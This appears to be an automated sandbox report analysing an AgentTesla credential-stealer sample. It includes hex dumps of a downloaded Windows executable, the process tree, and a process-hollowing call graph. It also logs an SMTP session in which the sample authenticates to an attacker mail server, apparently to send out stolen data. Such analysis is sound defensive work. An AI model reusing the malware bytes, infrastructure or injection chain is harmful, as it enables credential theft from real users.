                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              content-disposition: inline; filename=docii.exe
                                                              x-content-type-options: nosniff
                                                              permissions-policy: interest-cohort=()
                                                              x-frame-options: SAMEORIGIN
                                                              strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                              x-xss-protection: 1; mode=block
                                                              referrer-policy: no-referrer-when-downgrade
                                                              feature-policy: camera 'none'; microphone 'none'; geolocation 'none'; payment 'none'
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKKM2csrX0uH7j0HyyWnpua91PwokOU9xD%2FFFh8IhvSEj3R1JS5CElR2z6HJO6zBBPItZq%2BdTbDyQWO1aATlZP3nYw5a%2BRH1KMN6y6O09C1cn4x%2FoE4Jug1nUQbp1rRnQtE%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8cef229c2e570cc2-EWR
                                                              2024-10-07 16:05:52 UTC433INData Raw: 33 65 66 39 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e9 af 03 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a4 22 00 00 f4 02 00 00 00 00 00 0e c2 22 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 26 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                              Data Ascii: 3ef9MZ@!L!This program cannot be run in DOS mode.$PELg"" @ &`
                                                              2024-10-07 16:05:52 UTC1369INData Raw: 00 00 e0 22 00 00 f2 02 00 00 a6 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 25 00 00 02 00 00 00 98 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 c1 22 00 00 00 00 00 48 00 00 00 02 00 05 00 4c 6c 21 00 68 55 01 00 03 00 00 00 98 00 00 06 0c 4f 06 00 f8 0c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 00 00 06 00 00 00 00 00 00 00 28 c2 07 00 06 2a 06 2a 1e 02 28 01 00 00 0a 2a 13 30 04 00 3d 01 00 00 01 00 00 11 0e 04 28 02 00 00 0a 2d 1d 04 28 02 00 00 0a 2d 15 05 28 02 00 00 0a 2d 0d 0e 04 23 00 00 00 00 00 00 00 00 33 0a 23 00 00 00 00 00 00 f8 ff 2a 23 00
                                                              Data Ascii: ""@@.reloc%%@B"HLl!hUO0(**(*0=(-(-(-#3#*#
                                                              2024-10-07 16:05:52 UTC1369INData Raw: 00 00 06 16 16 28 03 00 00 0a 2a 5a 20 10 27 00 00 6a 80 01 00 00 04 7e 01 00 00 04 80 02 00 00 04 2a 32 02 16 6a 32 06 02 80 02 00 00 04 2a 1a 7e 02 00 00 04 2a 8a 02 28 02 00 00 0a 2d 08 03 28 02 00 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 02 03 28 06 00 00 0a 2a 00 00 00 13 30 02 00 64 00 00 00 02 00 00 11 02 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 02 8e 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 23 00 00 00 00 00 00 f0 7f 0a 02 0b 16 0c 2b 31 07 08 99 0d 09 28 02 00 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 09 06 34 02 09 0a 28 ca 04 00 06 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 08 17 58 0c 08 07 8e 69 32 c9 06 2a 13 30 02 00 87 00 00 00 06 00 00 11 02 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 02 8e 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 23 00 00 00 00 00 00 f0 7f 0a 23 00
                                                              Data Ascii: (*Z 'j~*2j2*~*(-(,#*(*0d-#*-#*#+1(,#*4(,#*Xi2*0-#*-#*##
                                                              2024-10-07 16:05:52 UTC1369INData Raw: 05 09 16 06 09 16 28 03 00 00 0a 28 09 00 00 0a 11 05 09 17 06 09 17 28 03 00 00 0a 28 09 00 00 0a 11 05 09 18 06 09 18 28 03 00 00 0a 28 09 00 00 0a 06 09 17 28 03 00 00 0a 11 06 36 0a 06 09 17 28 03 00 00 0a 13 06 06 09 18 28 03 00 00 0a 11 06 36 0a 06 09 18 28 03 00 00 0a 13 06 09 17 58 0d 09 07 32 92 03 2d 03 11 05 2a 11 06 23 00 00 00 00 00 00 f0 3f 58 13 06 07 8d 02 00 00 01 13 0d 16 13 0a 2b 2e 11 0d 11 0a 11 06 06 11 0a 17 28 03 00 00 0a 59 23 00 00 00 00 00 00 f0 3f 59 11 06 5a 06 11 0a 18 28 03 00 00 0a 58 a1 11 0a 17 58 13 0a 11 0a 07 32 cd 11 0d 28 18 00 00 06 13 0c 16 13 04 2b 4f 28 ca 04 00 06 2d 4d 11 05 11 04 16 06 11 0c 11 04 94 16 28 03 00 00 0a 28 09 00 00 0a 11 05 11 04 17 06 11 0c 11 04 94 17 28 03 00 00 0a 28 09 00 00 0a 11 05 11 04
                                                              Data Ascii: (((((((6((6(X2-*#?X+.(Y#?YZ(XX2(+O(-M((((
                                                              2024-10-07 16:05:52 UTC1369INData Raw: 00 06 2c 03 06 6a 2a 02 07 02 07 17 59 96 02 07 96 28 1f 00 00 06 9f 07 17 58 0b 07 02 8e 69 32 dc 02 02 8e 69 17 59 96 2a 00 13 30 05 00 78 00 00 00 0e 00 00 11 02 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 02 8e 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 02 8e 69 17 33 0e 02 16 99 28 72 02 00 06 28 74 02 00 06 26 02 8e 69 18 33 0c 02 16 99 02 17 99 28 20 00 00 06 2a 17 0a 2b 25 28 ca 04 00 06 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 02 06 02 06 17 59 99 02 06 99 28 20 00 00 06 a1 06 17 58 0a 06 02 8e 69 32 d5 02 02 8e 69 17 59 99 2a 13 30 02 00 2c 01 00 00 0f 00 00 11 02 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 02 8e 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 02 8e 69 17 33 04 02 16 99 2a 23 00 00 00 00 00 00 00 00 0b 28 5f 04 00 06 39 a0 00 00 00 12 06 fe 15 08 00 00 01 12 07 fe 15
                                                              Data Ascii: ,j*Y(Xi2iY*0x-#*-#*i3(r(t&i3( *+%(,#*Y( Xi2iY*0,-#*-#*i3*#(_9
                                                              2024-10-07 16:05:52 UTC1369INData Raw: 00 00 04 28 0d 00 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 06 6f 4e 00 00 06 38 f8 00 00 00 05 04 42 b5 00 00 00 0e 04 23 00 00 00 00 00 00 00 00 41 a5 00 00 00 04 0b 2b 4e 28 ca 04 00 06 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 06 02 03 07 28 8d 02 00 06 7d 03 00 00 04 06 7b 03 00 00 04 28 02 00 00 0a 2d 0d 06 7b 03 00 00 04 28 0d 00 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 06 6f 4e 00 00 06 07 0e 04 58 0b 07 05 30 ae 0e 04 65 05 07 59 59 23 00 00 00 00 00 00 e0 bf 0e 04 5a 36 76 06 02 03 05 28 8d 02 00 06 7d 03 00 00 04 06 7b 03 00 00 04 28 02 00 00 0a 2d 0d 06 7b 03 00 00 04 28 0d 00 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 06 6f 4e 00 00 06 2b 3c 04 05 33 38 06 02 03 04 28 8d 02 00 06 7d 03 00 00 04 06 7b 03 00 00 04 28 02 00 00 0a 2d 0d 06 7b 03 00 00
                                                              Data Ascii: (,#*oN8B#A+N(,#*(}{(-{(,#*oNX0eYY#Z6v(}{(-{(,#*oN+<38(}{(-{
                                                              2024-10-07 16:05:52 UTC1369INData Raw: 05 04 42 93 00 00 00 0e 04 23 00 00 00 00 00 00 00 00 41 83 00 00 00 04 0b 2b 3d 28 ca 04 00 06 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 02 03 07 28 8d 02 00 06 0c 08 28 02 00 00 0a 2d 08 08 28 0d 00 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 09 08 5a 0d 07 0e 04 58 0b 07 05 30 bf 0e 04 65 05 07 59 59 23 00 00 00 00 00 00 e0 bf 0e 04 5a 36 54 02 03 05 28 8d 02 00 06 0c 08 28 02 00 00 0a 2d 08 08 28 0d 00 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 09 08 5a 0d 2b 2b 04 05 33 27 02 03 04 28 8d 02 00 06 0c 08 28 02 00 00 0a 2d 08 08 28 0d 00 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 09 08 5a 0d 09 2a 00 13 30 03 00 e7 00 00 00 14 00 00 11 0e 04 28 02 00 00 0a 2d 1d 04 28 02 00 00 0a 2d 15 05 28 02 00 00 0a 2d 0d 0e 04 23 00 00 00 00 00 00 00 00 33 0a 23 00 00 00 00
                                                              Data Ascii: B#A+=(,#*((-(,#*ZX0eYY#Z6T((-(,#*Z++3'((-(,#*Z*0(-(-(-#3#
                                                              2024-10-07 16:05:52 UTC1369INData Raw: 26 00 00 00 29 00 00 00 2c 00 00 00 2f 00 00 00 32 00 00 00 35 00 00 00 38 00 00 00 3b 00 00 00 3e 00 00 00 41 00 00 00 44 00 00 00 47 00 00 00 4a 00 00 00 4d 00 00 00 50 00 00 00 53 00 00 00 56 00 00 00 59 00 00 00 5c 00 00 00 5f 00 00 00 62 00 00 00 65 00 00 00 b6 00 00 00 b6 00 00 00 b6 00 00 00 b6 00 00 00 b6 00 00 00 b6 00 00 00 68 00 00 00 6b 00 00 00 6e 00 00 00 71 00 00 00 74 00 00 00 77 00 00 00 7a 00 00 00 7d 00 00 00 80 00 00 00 83 00 00 00 86 00 00 00 89 00 00 00 8c 00 00 00 8f 00 00 00 92 00 00 00 95 00 00 00 98 00 00 00 9b 00 00 00 9e 00 00 00 a1 00 00 00 a4 00 00 00 a7 00 00 00 aa 00 00 00 ad 00 00 00 b0 00 00 00 b3 00 00 00 38 b1 00 00 00 16 2a 17 2a 18 2a 19 2a 1a 2a 1b 2a 1c 2a 1d 2a 1e 2a 1f 09 2a 1f 0a 2a 1f 0b 2a 1f 0c 2a 1f 0d 2a 1f
                                                              Data Ascii: &),/258;>ADGJMPSVY\_behknqtwz}8**************
                                                              2024-10-07 16:05:52 UTC1369INData Raw: 00 00 00 00 34 0a 23 00 00 00 00 00 00 f8 ff 2a 02 28 02 00 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 02 28 74 02 00 06 69 0a 03 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 03 8e 69 0b 07 2d 18 06 17 33 0a 23 00 00 00 00 00 00 00 00 2a 23 00 00 00 00 00 00 f8 ff 2a 07 8d 06 00 00 01 0c 16 0d 2b 22 03 09 99 13 04 11 04 28 02 00 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 08 09 11 04 69 9e 09 17 58 0d 09 07 32 da 06 08 28 33 00 00 06 2a 00 00 00 13 30 04 00 59 00 00 00 19 00 00 11 02 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 02 8e 2d 0a 23 00 00 00 00 00 00 f8 ff 2a 02 16 94 0a 02 8e 69 17 59 8d 06 00 00 01 0b 17 0c 2b 1d 07 08 17 59 02 08 94 9e 28 ca 04 00 06 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 08 17 58 0c 08 02 8e 69 32 dd 06 07 28 33 00 00 06 2a 00 00 00 13 30 04 00 59
                                                              Data Ascii: 4#*(,#*(ti-#*i-3#*#*+"(,#*iX2(3*0Y-#*-#*iY+Y(,#*Xi2(3*0Y
                                                              2024-10-07 16:05:52 UTC1369INData Raw: 00 34 26 f5 6b 0c 43 34 0a 23 00 00 00 00 00 00 2e 40 2a 02 23 00 80 e0 37 79 c3 41 43 34 0a 23 00 00 00 00 00 00 30 40 2a 02 23 00 a0 d8 85 57 34 76 43 34 0a 23 00 00 00 00 00 00 31 40 2a 02 23 00 c8 4e 67 6d c1 ab 43 34 0a 23 00 00 00 00 00 00 32 40 2a 02 23 00 3d 91 60 e4 58 e1 43 34 0a 23 00 00 00 00 00 00 33 40 2a 02 23 40 8c b5 78 1d af 15 44 34 0a 23 00 00 00 00 00 00 34 40 2a 02 23 50 ef e2 d6 e4 1a 4b 44 34 0a 23 00 00 00 00 00 00 35 40 2a 02 23 92 d5 4d 06 cf f0 80 44 34 0a 23 00 00 00 00 00 00 36 40 2a 02 23 f6 4a e1 c7 02 2d b5 44 34 0a 23 00 00 00 00 00 00 37 40 2a 02 23 b4 9d d9 79 43 78 ea 44 34 0a 23 00 00 00 00 00 00 38 40 2a 02 23 91 02 28 2c 2a 8b 20 45 34 0a 23 00 00 00 00 00 00 39 40 2a 02 23 35 03 32 b7 f4 ad 54 45 34 0a 23 00 00 00
                                                              Data Ascii: 4&kC4#.@*#7yAC4#0@*#W4vC4#1@*#NgmC4#2@*#=`XC4#3@*#@xD4#4@*#PKD4#5@*#MD4#6@*#J-D4#7@*#yCxD4#8@*#(,* E4#9@*#52TE4#


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449732172.67.74.1524437416C:\Users\user\Desktop\Ref#0503711.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-07 16:05:52 UTC155OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                              Host: api.ipify.org
                                                              Connection: Keep-Alive
                                                              2024-10-07 16:05:52 UTC211INHTTP/1.1 200 OK
                                                              Date: Mon, 07 Oct 2024 16:05:52 GMT
                                                              Content-Type: text/plain
                                                              Content-Length: 11
                                                              Connection: close
                                                              Vary: Origin
                                                              CF-Cache-Status: DYNAMIC
                                                              Server: cloudflare
                                                              CF-RAY: 8cef229c5de9c352-EWR
                                                              2024-10-07 16:05:52 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                              Data Ascii: 8.46.123.33


                                                              SMTP Packets

                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                              Oct 7, 2024 18:05:54.033406019 CEST58749733162.254.34.31192.168.2.4220 server1.educt.shop127.0.0.1 ESMTP Postfix
                                                              Oct 7, 2024 18:05:54.033644915 CEST49733587192.168.2.4162.254.34.31EHLO 936905
                                                              Oct 7, 2024 18:05:54.196470022 CEST58749733162.254.34.31192.168.2.4250-server1.educt.shop127.0.0.1
                                                              250-PIPELINING
                                                              250-SIZE 204800000
                                                              250-ETRN
                                                              250-STARTTLS
                                                              250-AUTH PLAIN LOGIN
                                                              250-AUTH=PLAIN LOGIN
                                                              250-ENHANCEDSTATUSCODES
                                                              250-8BITMIME
                                                              250-DSN
                                                              250 CHUNKING
                                                              Oct 7, 2024 18:05:54.201374054 CEST49733587192.168.2.4162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                              Oct 7, 2024 18:05:54.357970953 CEST58749733162.254.34.31192.168.2.4334 UGFzc3dvcmQ6
                                                              Oct 7, 2024 18:05:54.532505989 CEST58749733162.254.34.31192.168.2.4235 2.7.0 Authentication successful
                                                              Oct 7, 2024 18:05:54.542053938 CEST49733587192.168.2.4162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                              Oct 7, 2024 18:05:54.700805902 CEST58749733162.254.34.31192.168.2.4250 2.1.0 Ok
                                                              Oct 7, 2024 18:05:54.700965881 CEST49733587192.168.2.4162.254.34.31RCPT TO:<ambro@educt.shop>
                                                              Oct 7, 2024 18:05:55.862061977 CEST58749733162.254.34.31192.168.2.4250 2.1.5 Ok
                                                              Oct 7, 2024 18:05:55.862219095 CEST49733587192.168.2.4162.254.34.31DATA
                                                              Oct 7, 2024 18:05:56.018927097 CEST58749733162.254.34.31192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                              Oct 7, 2024 18:05:56.019640923 CEST49733587192.168.2.4162.254.34.31.
                                                              Oct 7, 2024 18:05:56.290463924 CEST58749733162.254.34.31192.168.2.4250 2.0.0 Ok: queued as C0E506C597
                                                              Oct 7, 2024 18:07:33.332895994 CEST49733587192.168.2.4162.254.34.31QUIT
                                                              Oct 7, 2024 18:07:33.489494085 CEST58749733162.254.34.31192.168.2.4221 2.0.0 Bye

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:12:05:48
                                                              Start date:07/10/2024
                                                              Path:C:\Users\user\Desktop\Ref#0503711.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Ref#0503711.exe"
                                                              Imagebase:0xf50000
                                                              File size:1'907'648 bytes
                                                              MD5 hash:3B2E54913C8B29CE886C8B36F8DD0CFC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:12:05:49
                                                              Start date:07/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\docdd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\docdd.exe"
                                                              Imagebase:0x470000
                                                              File size:46'592 bytes
                                                              MD5 hash:DBD0E17845DA07384D942B76268CF5B7
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:12:05:49
                                                              Start date:07/10/2024
                                                              Path:C:\Users\user\Desktop\Ref#0503711.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Ref#0503711.exe"
                                                              Imagebase:0x9a0000
                                                              File size:1'907'648 bytes
                                                              MD5 hash:3B2E54913C8B29CE886C8B36F8DD0CFC
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2919838157.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2919838157.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2919838157.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2919838157.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:3
                                                              Start time:12:05:54
                                                              Start date:07/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"
                                                              Imagebase:0x780000
                                                              File size:2'474'944 bytes
                                                              MD5 hash:1590A3EFB4A143305E7182FBD284A414
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1795600087.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:12:05:55
                                                              Start date:07/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"
                                                              Imagebase:0xd30000
                                                              File size:2'474'944 bytes
                                                              MD5 hash:1590A3EFB4A143305E7182FBD284A414
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:7
                                                              Start time:12:05:57
                                                              Start date:07/10/2024
                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 996
                                                              Imagebase:0x9e0000
                                                              File size:483'680 bytes
                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:13%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:2.2%
                                                                Total number of Nodes:400
                                                                Total number of Limit Nodes:43
                                                                execution_graph 54527 60a8058 54528 60a806d 54527->54528 54532 60a81ca 54528->54532 54537 60a82d7 54528->54537 54529 60a8083 54533 60a81ec 54532->54533 54534 60a83f9 54533->54534 54535 60e2418 VirtualProtect 54533->54535 54536 60e2420 VirtualProtect 54533->54536 54534->54529 54535->54533 54536->54533 54539 60a82dd 54537->54539 54538 60a83f9 54538->54529 54539->54538 54540 60e2418 VirtualProtect 54539->54540 54541 60e2420 VirtualProtect 54539->54541 54540->54539 54541->54539 54265 60e4708 54266 60e471d 54265->54266 54269 60e4886 54266->54269 54271 60e48a5 54269->54271 54270 60e4a55 54271->54270 54272 60e2418 VirtualProtect 54271->54272 54273 60e2420 VirtualProtect 54271->54273 54272->54271 54273->54271 54519 60e0bc8 54520 60e0c17 NtProtectVirtualMemory 54519->54520 54522 60e0c8f 54520->54522 54542 60ed958 54543 60ed96d 54542->54543 54544 60ed983 54543->54544 54549 60ee0bf 54543->54549 54553 60edda0 54543->54553 54557 60ee017 54543->54557 54561 60ee06a 54543->54561 54550 60ee0ba 54549->54550 54551 60eddfd 54549->54551 54550->54544 54551->54550 54565 60ef176 54551->54565 54555 60eddca 54553->54555 54554 60ee0ba 54554->54544 54555->54554 54556 60ef176 10 API calls 54555->54556 54556->54555 54559 60eddfd 54557->54559 54558 60ee0ba 54558->54544 54559->54558 54560 60ef176 10 API calls 54559->54560 54560->54559 54563 60eddfd 54561->54563 54562 60ee0ba 54562->54544 54563->54562 54564 60ef176 10 API calls 54563->54564 54564->54563 54566 60ef18d 54565->54566 54580 60ef2c2 54566->54580 54583 60ef4c2 54566->54583 54586 60ef1b7 54566->54586 54589 60ef1c8 54566->54589 54592 60ef2ab 54566->54592 54595 60ef40b 54566->54595 54598 60ef61b 54566->54598 54601 60ef36f 54566->54601 54604 60ef63f 54566->54604 54607 60ef2f1 54566->54607 54610 60ef4e1 54566->54610 54613 60ef3b0 54566->54613 54581 60ef22d 54580->54581 54616 60ef958 54581->54616 54584 60ef22d 54583->54584 54585 60ef958 10 API calls 54584->54585 54585->54584 54587 60ef1f5 54586->54587 54588 60ef958 10 API calls 54587->54588 54588->54587 54590 60ef1f5 54589->54590 54591 60ef958 10 API calls 54590->54591 54591->54590 54593 60ef22d 54592->54593 54594 60ef958 10 API calls 54593->54594 54594->54593 54596 60ef22d 54595->54596 54597 60ef958 10 API calls 54596->54597 54597->54596 54599 60ef22d 54598->54599 54600 60ef958 10 API calls 54599->54600 54600->54599 54602 60ef22d 54601->54602 54603 60ef958 10 API calls 54602->54603 54603->54602 54605 60ef22d 54604->54605 54606 60ef958 10 API calls 54605->54606 54606->54605 54608 60ef22d 54607->54608 54609 60ef958 10 API calls 54608->54609 54609->54608 54611 60ef22d 54610->54611 54612 60ef958 10 API calls 54611->54612 54612->54611 54614 60ef22d 54613->54614 54615 60ef958 10 API calls 54614->54615 54615->54614 54617 60ef97d 54616->54617 54631 6210b27 54617->54631 54636 6210935 54617->54636 54641 6210f05 54617->54641 54646 6210ce2 54617->54646 54651 6210c10 54617->54651 54656 6210881 54617->54656 54660 6210c6f 54617->54660 54665 6210ddf 54617->54665 54670 621011c 54617->54670 54675 621031d 54617->54675 54680 621017a 54617->54680 54684 62101bb 54617->54684 54632 6210b44 54631->54632 54689 60e1f28 54632->54689 54693 60e1f30 54632->54693 54633 6210b84 54637 6210179 54636->54637 54638 6210104 54636->54638 54697 60e1870 54637->54697 54701 60e1868 54637->54701 54642 6210f0f 54641->54642 54705 6212c79 54642->54705 54710 6212c88 54642->54710 54643 6210f70 54647 6210cfa 54646->54647 54723 62115a0 54647->54723 54728 6211590 54647->54728 54648 6210d12 54652 6210104 54651->54652 54653 621011c 54651->54653 54751 60e2148 54653->54751 54755 60e2140 54653->54755 54759 6212df9 54656->54759 54764 6212e08 54656->54764 54657 6210104 54661 6210c8c 54660->54661 54663 60e1f28 WriteProcessMemory 54661->54663 54664 60e1f30 WriteProcessMemory 54661->54664 54662 6210cb9 54663->54662 54664->54662 54666 6210de9 54665->54666 54668 6212c79 2 API calls 54666->54668 54669 6212c88 2 API calls 54666->54669 54667 6210f70 54668->54667 54669->54667 54671 6210126 54670->54671 54673 60e2148 NtResumeThread 54671->54673 54674 60e2140 NtResumeThread 54671->54674 54672 6210104 54673->54672 54674->54672 54676 6210327 54675->54676 54678 6212c79 2 API calls 54676->54678 54679 6212c88 2 API calls 54676->54679 54677 6210f70 54678->54677 54679->54677 54682 60e1868 Wow64SetThreadContext 54680->54682 54683 60e1870 Wow64SetThreadContext 54680->54683 54681 6210104 54682->54681 54683->54681 54685 62101d8 54684->54685 54687 60e1f28 WriteProcessMemory 54685->54687 54688 60e1f30 WriteProcessMemory 54685->54688 54686 60ef99f 54686->54581 54687->54686 54688->54686 54690 60e1f30 WriteProcessMemory 54689->54690 54692 60e2015 54690->54692 54692->54633 54694 60e1f7c WriteProcessMemory 54693->54694 54696 60e2015 54694->54696 54696->54633 54698 60e18b9 Wow64SetThreadContext 54697->54698 54700 60e1931 54698->54700 54700->54638 54702 